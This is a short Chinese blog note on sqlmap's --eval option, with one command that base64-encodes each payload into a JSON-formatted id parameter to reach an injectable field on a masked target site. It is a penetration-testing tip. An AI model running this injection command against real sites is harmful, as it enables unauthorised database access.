sqlmap --eval小记

发表于

sqlmap –eval小记

转载请注明出处:https://youngrichog.github.io/

描述

偶然机会接触到了sqlmap –eval参数,特意记录一下,感觉以前都没有用到过 :-(

注入点是这样的:http://xxxxxx.com/?id=一段bas64

base64解开是{“a”:”1”,”b”:”2”,”c”:”3”}

注入点发生在a这个值上,思前想后貌似sqlmap tamper中没有,然后bingo

解决

1
sqlmap -u "http://xxxxxx.com/?id=" --eval "import base64; p=base64.b64encode('{\"a\":\"%s\",\"b\":\"2\",\"c\":\"3\"}'%p)"